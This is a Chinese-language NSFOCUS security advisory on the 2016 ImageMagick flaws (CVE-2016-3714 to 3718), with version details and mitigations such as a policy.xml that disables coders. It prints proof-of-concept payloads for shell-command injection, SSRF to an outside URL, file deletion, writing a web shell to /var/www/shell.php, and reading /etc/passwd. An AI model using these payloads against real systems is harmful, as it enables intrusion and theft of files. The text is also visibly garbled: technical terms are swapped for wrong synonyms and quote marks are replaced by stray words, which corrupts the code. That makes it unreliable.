利用了ImageMagick软件的网站均会受到影响。
个中的漏洞信息列表如下:
CVE_ID

级别
描述
CVE-2016-3714
严重
Shell命令字符串过滤不严格导致(可能远程)代码实行
CVE-2016-3718
中
SSRF(做事器端要求假造)
CVE-2016-3715
中
文件删除
CVE-2016-3716
中
文件移动
CVE-2016-3717
低
本地文件读取
详情见如下地址:
http://www.openwall.com/lists/oss-security/2016/05/03/18
绿盟科技威胁预警级别
高等:影响范围比较广,危害严重,利用难度较低,724小时内部应急跟踪,24小时内完成技能剖析、产品升级和防护方案。
什么是ImageMagick?
ImageMagick软件是用C措辞编写的,可用来显示、转换以及编辑图形,支持超过200种图像文件格式,并且可以跨平台运行。
ImageMagick软件被许多编程措辞所支持,包括Perl,C++,PHP,Python和Ruby等,并被支配在数以百万计的网站,博客,社交媒体平台和盛行的内容管理系统(CMS)。
影响的版本
ImageMagick < 6.9.3-10
不受影响的版本
ImageMagick 6.9.3-10
漏洞影响
在ImageMagick软件的图片解码器中,存在多个漏洞,详细如下:
CVE_ID
描述
CVE-2016-3714
Shell命令字符串过滤不严格导致(可能远程)代码实行。
ImageMagick许可利用外部扩展库对文件进行处理,这种特色叫做“delegate”,通过利用system函数调用实现HTTPS的要求处理,对用户传入的shell参数没有做好过滤导致任意代码实行。
HTTPS要求:
\"大众wget\公众 -q -O \"大众%o\"大众 \"大众https:%M\"大众
%M为传入的真实链接,将其值更换如下:
'https://example.com\"大众;|ls \"大众-la'
则可以实行’ls -al’命令。
CVE-2016-3718
SSRF(做事器端要求假造)
有可能导致做事器发起HTTP GET或者FTP的要求。push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)' //这里发起对外连接要求。
pop graphic-context
CVE-2016-3715
文件删除
通过ImageMagick的 'ephemeral'伪协议对文件进行读后删除。
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt' //这里发起文件删除
popgraphic-context
CVE-2016-3716
文件移动
通过ImageMagick的 'msl'伪协议实现任意移动图片文件到任意文件目录并将其命名成任意扩展名。
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt' //处理msl脚本
popgraphic-context
/tmp/msl.txt内容如下:
<?xml version=\公众1.0\公众 encoding=\公众UTF-8\"大众?>
<image>
<read filename=\"大众/tmp/image.gif\"大众 />
<write filename=\公众/var/www/shell.php\"大众 />
</image>
CVE-2016-3717
本地文件读取
通过ImageMagick的 'label'伪协议获取文件内容。
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'//读取/etc/passwd文件内容
pop graphic-context
修复方法
ImageMagick版本升级到6.9.3-10。
目前厂商已经发布了升级补丁修复了安全问题,请到厂商主页下载:
http://legacy.ImageMagick.org/script/binary-releases.php
验证文件的“magic bytes”,确定为期望的图片文件格式,详细文件格式的“magicbytes”参考如下网站:
https://en.wikipedia.org/wiki/List_of_file_signatures
利用策略文件禁用存在漏洞的编码器,全局策略文件常日位于“/etc/ImageMagick”,增加如下内容:
<policymap>
<policydomain=\公众coder\公众 rights=\"大众none\公众 pattern=\"大众EPHEMERAL\"大众/>
<policydomain=\"大众coder\公众 rights=\公众none\"大众 pattern=\"大众URL\"大众 />
<policydomain=\公众coder\"大众 rights=\"大众none\"大众 pattern=\"大众HTTPS\公众/>
<policydomain=\公众coder\"大众 rights=\"大众none\"大众 pattern=\"大众MVG\公众 />
<policydomain=\"大众coder\"大众 rights=\"大众none\"大众 pattern=\公众MSL\公众 />
</policymap>
本文由“135编辑器”供应技能支持
绿盟科技安全团队会持续关注事态变革,后续会发布详细的剖析报告、产品升级及办理方案,请广大用户随时关注。
绿盟科技威胁事宜定级标准
级别
描述
高
影响范围比较广,危害严重,利用难度较低,724小时内部应急跟踪,24小时内完成技能剖析、产品升级和防护方案。
中
影响范围可控,危害程度可控,利用难度较高,78小时内部应急跟踪,72小时内完成技能剖析、产品升级和防护方案。
低
影响较小,危害程度较小。
声明
本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告供应任何担保或承诺。
由于传播、利用此安全公告所供应的信息而造成的任何直接或者间接的后果及丢失,均由利用者本人卖力,绿盟科技以及安全公告作者不为此承担当何任务。
绿盟科技拥有对此安全公告的修正和解释权。如欲转载或传播此安全公告,必须担保此安全公告的完全性,包括版权声明等全部内容。
未经绿盟科技许可,不得任意修正或者增减此安全公告内容,不得以任何办法将其用于商业目的。
关于绿盟科技
绿盟科技(NSFOCUS Co., Ltd.)是中国网络安全领域的领导企业,致力于网络和系统安全问题的研究、高端网络安全产品的研发、发卖与网络安全做事,在入侵检测/保护、远程评估、 DDoS攻击防护等方面供应具有国际竞争能力的前辈产品,是海内最具安全做事履历的专业公司。
有关绿盟科技的详情请拜会:
http://www.nsfocus.com